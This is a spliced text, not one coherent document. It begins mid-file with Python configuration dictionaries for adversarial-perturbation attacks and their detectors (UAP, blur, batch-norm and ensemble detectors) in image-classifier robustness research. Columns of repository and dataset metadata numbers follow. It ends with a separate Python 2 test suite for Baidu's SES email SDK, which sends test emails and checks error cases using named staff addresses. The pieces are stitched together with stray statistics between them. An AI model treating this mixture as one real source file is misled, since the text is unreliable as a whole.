r3_gt_filt_att_x3 = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 300, 'targeted': True, 'random_targets': False}}
################################# DETECTORS #######################################################
# untargeted L1 detectors
r3_ut_l1_edet = {'att_dict': r3_ut_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_ut_l1_tdet = {'att_dict': r3_ut_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# random targeted L1 detectors
r3_rt_l1_edet = {'att_dict': r3_rt_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_rt_l1_tdet = {'att_dict': r3_rt_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# guessed targeted L1 detectors
r3_gt_l1_edet = {'att_dict': r3_gt_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_gt_l1_tdet = {'att_dict': r3_gt_l1_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# untargeted filter-difference detectors
r3_ut_filtdiff_edet = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_ut_filtdiff_tdet = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# random targeted filter-difference detectors
r3_rt_filtdiff_edet = {'att_dict': r3_rt_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_rt_filtdiff_tdet = {'att_dict': r3_rt_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# guessed targeted filter-difference detectors
r3_gt_filtdiff_edet = {'att_dict': r3_gt_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_gt_filtdiff_tdet = {'att_dict': r3_gt_filt_att, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# untargeted filter detectors
r3_ut_filt_edet = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_tdet = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# random targeted filter detectors
r3_rt_filt_edet = {'att_dict': r3_rt_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_rt_filt_tdet = {'att_dict': r3_rt_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# guessed targeted filter detectors
r3_gt_filt_edet = {'att_dict': r3_gt_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_gt_filt_tdet = {'att_dict': r3_gt_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
# untargeted L1 blur detector
r3_ut_blur = {'att_dict': r3_ut_l1_att, 'det_class': 'BlurDetector', 'kwargs': {}}
# random targeted L1 blur detector
r3_rt_blur = {'att_dict': r3_rt_l1_att, 'det_class': 'BlurDetector', 'kwargs': {}}
# guessed targeted L1 blur detector
r3_gt_blur = {'att_dict': r3_gt_l1_att, 'det_class': 'BlurDetector', 'kwargs': {}}
# batch norm detector
r3_bn = {'det_class': 'BNDetector', 'kwargs': {}}
r3_ut_filtdiff_tdet_x3 = {'att_dict': r3_ut_filt_att_x3, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 30, 'training': True}}
r3_gt_l1_tdet_x3 = {'att_dict': r3_gt_l1_att_x3, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 30, 'training': True}}
r3_ut_blur_x3 = {'att_dict': r3_ut_l1_att_x3, 'det_class': 'BlurDetector', 'kwargs': {}}
r3_ut_l1_tdet_x3 = {'att_dict': r3_ut_l1_att_x3, 'det_class': 'UAPDetector', 'type': 'diff', 'kwargs': {'pert_scale': 1.0, 'nbatches': 30, 'training': True}}
r3_rt_filt_tdet_x3 = {'att_dict': r3_rt_filt_att_x3, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 30, 'training': True}}
r3_ut_filt_tdet_sc2 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_sc5 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_sc05 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_sc025 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': True}}
r3_ut_filt_att_01 = {'type': 'filt', 'kwargs': {'eps': 0.01, 'nims': 100, 'targeted': False}}
r3_ut_filt_att_003 = {'type': 'filt', 'kwargs': {'eps': 0.003, 'nims': 100, 'targeted': False}}
r3_ut_filt_att_1 = {'type': 'filt', 'kwargs': {'eps': 0.1, 'nims': 100, 'targeted': False}}
r3_ut_filt_tdet_att_01 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_003 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_1 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_01_sc2 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_01_sc5 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_01_sc05 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_01_sc025 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_003_sc2 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_003_sc5 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_003_sc05 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_003_sc025 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_1_sc2 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_1_sc5 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_1_sc05 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': True}}
r3_ut_filt_tdet_att_1_sc025 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': True}}
r3_ut_filt_edet_att_01_sc2 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_01_sc5 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_01_sc05 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_01_sc025 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_003_sc2 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_003_sc5 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_003_sc05 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_003_sc025 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_1_sc2 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_1_sc5 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_1_sc05 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_1_sc025 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_sc2 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 2.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_sc5 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 5.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_sc05 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.5, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_sc025 = {'att_dict': r3_ut_filt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 0.25, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_01 = {'att_dict': r3_ut_filt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_003 = {'att_dict': r3_ut_filt_att_003, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_ut_filt_edet_att_1 = {'att_dict': r3_ut_filt_att_1, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
import numpy as np
r3_ut_inffilt_att = {'type': 'filt', 'kwargs': {'eps': 0.0003, 'nims': 100, 'targeted': False, 'ord': np.inf}}
r3_ut_inffilt_att_01 = {'type': 'filt', 'kwargs': {'eps': 0.001, 'nims': 100, 'targeted': False, 'ord': np.inf}}
r3_ut_inffilt_edet_att = {'att_dict': r3_ut_inffilt_att, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
r3_ut_inffilt_edet_att_01 = {'att_dict': r3_ut_inffilt_att_01, 'det_class': 'UAPDetector', 'type': 'filt', 'kwargs': {'pert_scale': 1.0, 'nbatches': 10, 'training': False}}
################################# ENSEMBLES #######################################################
ens14 = {
'det_class': 'LogRegEnsembleDetector',
'components': [
r3_ut_l1_tdet,
r3_rt_l1_tdet,
r3_ut_inffilt_edet_att_01,
r3_ut_filt_tdet,
r3_ut_filt_tdet_att_1,
r3_ut_filt_tdet_att_01_sc2,
r3_ut_filt_edet_att_01_sc2,
r3_ut_filt_tdet_att_003_sc5
]}
| 86.167665
| 175
| 0.668659
| 2,206
| 14,390
| 3.982321
| 0.035811
| 0.052817
| 0.08469
| 0.162322
| 0.953899
| 0.924872
| 0.90074
| 0.880592
| 0.865339
| 0.859192
| 0
| 0.064928
| 0.112717
| 14,390
| 166
| 176
| 86.686747
| 0.62312
| 0.075191
| 0
| 0
| 0
| 0
| 0.390887
| 0.00169
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010309
| 0
| 0.010309
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e72d2100a64490b0018d146d3d32988f5ffe70a
| 16,175
|
py
|
Python
|
test/ses/test_post_email.py
|
yunfan/bce-sdk-python
|
00df2be78cd44373c3d99cd1bb69d17968f30d2b
|
[
"Apache-2.0"
] | 22
|
2015-10-26T03:00:11.000Z
|
2021-09-08T09:30:51.000Z
|
test/ses/test_post_email.py
|
yunfan/bce-sdk-python
|
00df2be78cd44373c3d99cd1bb69d17968f30d2b
|
[
"Apache-2.0"
] | 8
|
2018-07-18T02:47:09.000Z
|
2020-12-10T02:30:37.000Z
|
test/ses/test_post_email.py
|
yunfan/bce-sdk-python
|
00df2be78cd44373c3d99cd1bb69d17968f30d2b
|
[
"Apache-2.0"
] | 14
|
2016-01-12T11:57:38.000Z
|
2021-03-10T03:35:12.000Z
|
#!/usr/bin/env python
#coding:utf-8
"""
@author wanglinqing01@baidu.com
@date 2014/10/08
@brief post Email
"""
import os
import sys
import json
import time
import traceback
_NOW_PATH = os.path.dirname(os.path.abspath(__file__)) + '/'
_BCE_PATH = _NOW_PATH + '../'
sys.path.insert(0, _BCE_PATH)
import bes_base_case
from baidubce.services.ses import client
from baidubce.services.ses import exception as ses_exception
from baidubce import exception
class TestPostEmail(bes_base_case.BaseTest):
def __init__(self):
super(self.__class__, self).__init__()
def setUp(self):
time.sleep(1)
def tearDown(self):
pass
#verified email:wanglinqing01@baidu.com, verified domain:126.com
def test_post_email_normal(self):
#print self.host
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
attach_list = ['1']
attach_list[0] = _NOW_PATH + 'bms_api_test.py'
resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], cc_addr=["wanglinqing2010@126.com"], bcc_addr=["zhuimeng_2006jsj@126.com"], subject="test post email normal", text="test ses python sdk email normal", attachments=attach_list, priority=1)
#print resp
assert resp.status == 200, 'status is not 200'
def test_post_email_attachmentPdf(self):
#print self.host
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
attach_list = ['1']
attach_list[0] = _NOW_PATH + 'personal_plan.pdf'
resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com", "zhangzheyuan@baidu.com"], subject="test post email pdf", text="test ses python sdk pdf", attachments=attach_list, priority=1)
#print resp
assert resp.status == 200, 'status is not 200'
def test_post_email_attachmentPdfLongTitle(self):
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
attach_list = ['1']
attach_list[0] = _NOW_PATH + 'personal_plan_personal_plan_personal_plan_personal_plan_personal_plan.pdf'
resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="test post email pdf long title", text="test ses python sdk pdf long title", attachments=attach_list, priority=1)
assert resp.status == 200, 'status is not 200'
def test_post_email_attachmentTxt(self):
#print self.host
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
attach_list = ['1']
attach_list[0] = _NOW_PATH + 'bes_sdk_test.txt'
resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="test post email txt", text="test ses python sdk txt", attachments=attach_list, priority=1)
#print resp
assert resp.status == 200, 'status is not 200'
def test_post_email_attachmentDoc(self):
#print self.host
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
attach_list = ['1']
attach_list[0] = _NOW_PATH + 'ses_api_v1.7.docx'
resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="test post email doc", text="test ses python sdk doc", attachments=attach_list, priority=1)
#print resp
assert resp.status == 200, 'status is not 200'
def test_post_email_ChineseSubject(self):
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="我是中文主题邮件", text="测试中文主题")
assert resp.status == 200, 'status is not 200'
def test_post_email_onlyCc(self):
#print self.host
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
resp = cli.send_mail(mail_from=email, cc_addr=["wanglinqing2010@126.com"], subject="test post email only CC_addr", text=" email only cc_addr")
assert resp.status == 200, 'status is not 200'
def test_post_email_onlyBcc(self):
#print self.host
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
resp = cli.send_mail(mail_from=email, bcc_addr=["wanglinqing01@baidu.com"], subject="test post email only bcc_addr", text=" email only bcc_addr")
assert resp.status == 200, 'status is not 200'
def test_post_email_emptyAttachments(self):
#print self.host
cli = client.SesClient(self.host, self.ak, self.sk)
email = 'wanglinqing01@baidu.com'
resp = cli.send_mail(mail_from=email, to_addr=["wanglinqing01@baidu.com"], subject="test post email without attachments", text="test ses python sdk without attachments")
#print resp
assert resp.status == 200, 'status is not 200'
def test_post_email_emptySender(self):
cli = client.SesClient(self.host, self.ak, self.sk)
flag = False
try:
resp = cli.send_mail("''", to_addr=['wanglinqing01@baidu.com'])
except exception.ServerError as e:
flag = True
print "it have an exception"
tracemsg = traceback.format_exc()
print e
finally:
assert flag == True, 'it should throw exception'
def test_post_email_emptyReceiver(self):
cli = client.SesClient(self.host, self.ak, self.sk)
flag = False
try:
resp = cli.send_mail('wanglinqing01@baidu.com', subject="test post email, no receiver", text="test ses python sdk, no receiver")
except ses_exception.InvalidParam as e:
flag = True
print "it have an exception"
tracemsg = traceback.format_exc()
print e
finally:
assert flag == True, 'it should throw exception'
def test_post_email_receiverFormatInvalid(self):
cli = client.SesClient(self.host, self.ak, self.sk)
flag = False
try:
resp = cli.send_mail('wanglinqing01@baidu.com', to_addr=['wanglinqing01'], subject="test post email, receiver format invalid", text="test ses python sdk, receiver format invalid")
except exception.ServerError as e:
flag = True
print "it have an exception"
tracemsg = traceback.format_exc()
print e
finally:
assert flag == True, 'it should throw exception'
def test_post_email_senderNotVerified(self):
cli = client.SesClient(self.host, self.ak, self.sk)
flag = False
try:
resp = cli.send_mail('wanglinqingtest@baidu.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email, sender not verified", text="test ses python sdk, sender not verified")
except exception.ServerError as e:
flag = True
print "it have an exception"
tracemsg = traceback.format_exc()
print e
finally:
assert flag == True, 'it should throw exception'
def test_post_email_senderDomainNotVerified(self):
cli = client.SesClient(self.host, self.ak, self.sk)
flag = False
try:
resp = cli.send_mail('wanglinqing2013@163.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email, senderDomain not verified", text="test ses python sdk, senderDomain not verified")
except exception.ServerError as e:
flag = True
print "it have an exception"
tracemsg = traceback.format_exc()
print e
finally:
assert flag == True, 'it should throw exception'
def test_post_email_senderFormatNotVerified(self):
cli = client.SesClient(self.host, self.ak, self.sk)
flag = False
try:
resp = cli.send_mail('wanglinqing01', to_addr=['wanglinqing01@baidu.com'], subject="test post email, sender format not valid", text="test ses python sdk, sender format not valid")
except exception.ServerError as e:
flag = True
print "it have an exception"
tracemsg = traceback.format_exc()
print e
finally:
assert flag == True, 'it should throw exception'
def test_post_email_emptySubject(self):
cli = client.SesClient(self.host, self.ak, self.sk)
flag = False
try:
resp = cli.send_mail('wanglinqing01@baidu.com', to_addr=['wanglinqing01@baidu.com'], text="test ses python sdk, subject empty")
except exception.ServerError as e:
flag = True
print "it have an exception"
tracemsg = traceback.format_exc()
print e
finally:
assert flag == True, 'it should throw exception'
def test_post_email_moreReceiver(self):
cli = client.SesClient(self.host, self.ak, self.sk)
resp = cli.send_mail('wanglinqing01@baidu.com',
to_addr=['wanglinqing01@baidu.com', 'wanglinqing2010@126.com'],
subject="test post email, more receiver",
text="test ses python sdk, more receiver")
assert resp.status == 200, 'status is not 200'
def test_post_email_receiverDuplicate(self):
cli = client.SesClient(self.host, self.ak, self.sk)
resp = cli.send_mail('wanglinqing01@baidu.com',
to_addr=['wanglinqing01@baidu.com', 'wanglinqing01@baidu.com'],
subject="test post email, receiver duplicate",
text="test ses python sdk, receiver duplicate")
assert resp.status == 200, 'status is not 200'
def test_post_email_longTitle(self):
cli = client.SesClient(self.host, self.ak, self.sk)
resp = cli.send_mail('wanglinqing01@baidu.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email long title long title long title long title long title long title long title long title long title long title long title long title long title long title", text="test ses python sdk, receiver duplicate")
assert resp.status == 200, 'status is not 200'
def test_post_email_domainVerified(self):
cli = client.SesClient(self.host, self.ak, self.sk)
resp = cli.send_mail('wanglinqing2010@126.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email, sender not verified but domain verified", text="test ses python sdk, sender not verified but domain verified")
assert resp.status == 200, 'status is not 200'
def test_post_email_noParam(self):
cli = client.SesClient(self.host, self.ak, self.sk)
flag = False
try:
resp = cli.send_mail()
except ses_exception.InvalidParam as e:
flag = True
print "it have an exception"
tracemsg = traceback.format_exc()
print e
finally:
assert flag == True, 'it should throw exception'
def test_post_email_htmlFormat(self):
cli = client.SesClient(self.host, self.ak, self.sk)
resp = cli.send_mail('wanglinqing2010@126.com', to_addr=['wanglinqing01@baidu.com'], subject="test post email, html format", html='<html><body><div><h3 align=\"center\">资源总数统计</h3><table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\" align=\"center\"> <tr><th bgColor=\"426ab3\">type</th><th bgColor=\"426ab3\">count</th></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">15</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">RDS关系型数据库</td><td align=\"center\" bgColor=\"#9b95c9\">15</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">15</td></tr><tr> <td align=\"center\" bgColor=\"#fab27b\">BOS对象存储服务</td><td align=\"center\" bgColor=\"#fab27b\">15</td></tr><tr> <td align=\"center\" bgColor=\"#c88400\">BMR百度MapReduce</td><td align=\"center\" bgColor=\"#c88400\">15</td></tr><tr> <td align=\"center\" bgColor=\"#b7ba6b\">CDN服务</td><td align=\"center\" bgColor=\"#b7ba6b\">15</td></tr><tr> <td align=\"center\" bgColor=\"#769149\">SES邮件服务</td><td align=\"center\" bgColor=\"#769149\">15</td></tr><tr> <td align=\"center\" bgColor=\"#78a355\">SMS短信服务</td><td align=\"center\" bgColor=\"#78a355\">15</td></tr></table></div><div><h3 align=\"center\">资源数量top10用户统计</h3><table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" align=\"center\"> <tr><th bgColor=\"426ab3\">type</th><th bgColor=\"426ab3\">iam_account_id</th> <th bgColor=\"426ab3\">count</th></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">dcf5a8476ba443988322ed577d67b8ef</td><td align=\"center\" bgColor=\"#9b95c9\"> 10</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">dcf5a8476ba443988322ed577d67b8ef</td><td align=\"center\" bgColor=\"#9b95c9\"> 10</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">1734317d-40c6-4950-b1f1-f45393970f63</td><td align=\"center\" bgColor=\"#9b95c9\"> 9</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#9b95c9\"> 6</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">33ee9b2d-228b-42c2-aae5-b1f1841374fb</td><td align=\"center\" bgColor=\"#9b95c9\"> 6</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">0a784fe6cc4d49879b882645023aaa73</td><td align=\"center\" bgColor=\"#867892\"> 10</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">dcf5a8476ba443988322ed577d67b8ef1</td><td align=\"center\" bgColor=\"#867892\"> 10</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">1734317d-40c6-4950-b1f1-f45393970f63</td><td align=\"center\" bgColor=\"#867892\"> 7</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#867892\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">33ee9b2d-228b-42c2-aae5-b1f1841374fb</td><td align=\"center\" bgColor=\"#867892\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#fab27b\">BOS对象存储服务</td><td align=\"center\" bgColor=\"#fab27b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#fab27b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#fab27b\">BOS对象存储服务</td><td align=\"center\" bgColor=\"#fab27b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#fab27b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#fab27b\">BOS对象存储服务</td><td align=\"center\" bgColor=\"#fab27b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#fab27b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#b7ba6b\">CDN服务</td><td align=\"center\" bgColor=\"#b7ba6b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#b7ba6b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#b7ba6b\">CDN服务</td><td align=\"center\" bgColor=\"#b7ba6b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#b7ba6b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#b7ba6b\">CDN服务</td><td align=\"center\" bgColor=\"#b7ba6b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#b7ba6b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#769149\">SES邮件服务</td><td align=\"center\" bgColor=\"#769149\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#769149\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#769149\">SES邮件服务</td><td align=\"center\" bgColor=\"#769149\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#769149\"> 5</td></tr></table></div></body></html>')
